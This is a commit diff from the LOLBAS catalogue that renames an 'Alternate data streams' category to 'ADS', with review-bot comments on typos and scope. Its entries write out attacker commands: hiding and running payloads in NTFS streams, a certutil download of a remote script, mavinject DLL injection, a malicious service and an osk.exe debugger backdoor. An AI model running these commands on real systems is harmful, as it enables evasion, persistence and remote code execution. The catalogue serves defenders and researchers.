Changed alternate data stream to ADS as category

Oddvar Moe 2018-09-26 09:34:01 +02:00
parent 7961a99173
commit d48273583e
19 changed files with 28 additions and 25 deletions

View File

@ -3,7 +3,10 @@
#Author: Oddvar Moe
#If you can use it, be my guest!
$mainpath = "C:\data\gitprojects\LOLBAS"
# Install-Module powershell-yaml
# import-module powershell-yaml
$mainpath = "C:\LOLBAS"
function Convert-YamlToMD
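Review bot: The `$mainpath` change (`C:\data\gitprojects\LOLBAS` to `C:\LOLBAS`) and the two commented-out `powershell-yaml` lines in this hunk have nothing to do with the category rename named in the commit message and belong in a separate commit. The path is still hardcoded to one machine's layout; deriving it from `$PSScriptRoot` or taking it as a parameter of `Convert-YamlToMD` would let the script run from any checkout. Since the script depends on the `powershell-yaml` module, an active `#Requires -Modules powershell-yaml` (or an uncommented `Import-Module powershell-yaml`) would fail early with a clear message instead of leaving the dependency as a comment.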

View File

@ -7,7 +7,7 @@ Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
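Review bot: The `Command:` context line of this hunk chains six `bitsadmin` invocations with no separator (`... /create 1 bitsadmin /addfile 1 ...`), so it cannot be pasted or parsed as written; separate them with `&&` or split them into one `Command:` entry per step. Also, if anything in the generator shown in the first hunk (`Convert-YamlToMD`) keys on the old `Alternate data streams` string, it needs the same update to `ADS`, or entries will render under two categories.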

View File

@ -15,7 +15,7 @@ Commands:
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105

View File

@ -7,7 +7,7 @@ Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1196
MitreLink: https://attack.mitre.org/wiki/Technique/T1196

View File

@ -7,7 +7,7 @@ Commands:
- Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
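Review bot: Typo in the `Description:` context line of this hunk: `exectute` should be `execute`; worth fixing while the file is being touched.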

View File

@ -15,7 +15,7 @@ Commands:
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
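Review bot: The `Usecase:` line of this hunk (`Copy file and hide it in an alternate data stream as a defensive counter measure`), repeated in the third hunk of this file, describes the opposite of what the entry means: hiding a payload in an ADS evades defensive countermeasures rather than being one. Suggest `Copy file and hide it in an alternate data stream to evade defensive countermeasures`, matching the wording used in the findstr and wmic entries.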
@ -23,7 +23,7 @@ Commands:
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
Usecase: Extract hidden file within alternate data streams
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -31,7 +31,7 @@ Commands:
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -23,7 +23,7 @@ Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Description: Copies source file to destination Alternate Data Stream (ADS)
Usecase: Copies files from A to B
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
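Review bot: Style point in the `Description:` context line of this hunk: `unc path` should be `UNC path`.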

View File

@ -7,7 +7,7 @@ Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -15,7 +15,7 @@ Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
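Review bot: The `Description:` context line of this hunk abbreviates Alternate Data Stream as `(AD)`; every other entry uses `(ADS)` and the new category value is `ADS`, so change it to `(ADS)` here for consistency.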

View File

@ -7,7 +7,7 @@ Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -15,7 +15,7 @@ Commands:
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
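Review bot: The MITRE mapping in this hunk looks inconsistent with the entry's own wording: `MitreID: T1096` (the same NTFS-attribute technique the other ADS entries use) describes where the DLL is stored, while the `Usecase:` is `Inject dll file into running process`, which is a different behaviour. Decide whether the ADS storage or the injection is the primary technique this entry documents and map it accordingly.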

View File

@ -31,7 +31,7 @@ Commands:
- Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170

View File

@ -7,7 +7,7 @@ Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
Usecase: Hide/plant registry information in Alternate data stream for later use
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.
Usecase: Hide registry data in alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: regedit C:\ads\file.txt:regfile.reg"
Description: Import the target .REG file into the Registry.
Usecase: Import hidden registry data from alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
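Review bot: The `Command:` context line of this hunk has an unbalanced trailing quote: `regedit C:\ads\file.txt:regfile.reg"`. Drop the stray `"` (or quote the whole path) so the entry can be copied as written.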

View File

@ -7,7 +7,7 @@ Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Description: Creates a new service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
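Review bot: The `Command:` context line of this hunk has a stray `\` after the start type (`start= auto\ & sc start evilservice`), which looks like a typo and should read `start= auto & sc start evilservice`. The escaping inside `binPath=` is also mixed: `c:\\ADS\\file.txt` doubles the backslashes while `c:\ADS\works.txt` does not, so pick one form for the whole value.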

View File

@ -7,7 +7,7 @@ Commands:
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -20,7 +20,7 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
- Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
Category: Execute
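Review bot: This hunk (the osk.exe `Image File Execution Options` Debugger entry) is not an ADS category change and is unrelated to the commit message; rewriting the command to drop the empty `/user: /password: /node:` switches and the surrounding single quotes is a reasonable cleanup, but it belongs in its own commit. With the single quotes gone the value is now a plain YAML scalar, so the embedded `\"` sequences are taken literally; confirm the generator renders the command as intended. Also, `Usecase: Execute binary by manipulate the debugger` should read `by manipulating the debugger`.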

View File

@ -7,7 +7,7 @@ Commands:
- Command: wscript c:\ads\file.txt:script.vbs
Description: Execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096